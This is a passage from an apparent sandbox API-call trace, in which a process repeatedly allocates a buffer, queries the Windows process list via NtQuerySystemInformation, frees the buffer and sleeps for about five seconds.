ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.471] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.472] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.489] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.512] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.517] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.535] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.550] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.567] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.578] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.578] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.581] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.597] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.610] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.613] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.614] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.627] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.644] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.659] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.659] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.675] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.676] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.688] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.691] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.691] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.708] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.719] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.719] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.722] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.737] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.737] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.752] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.753] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.772] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.785] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.800] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 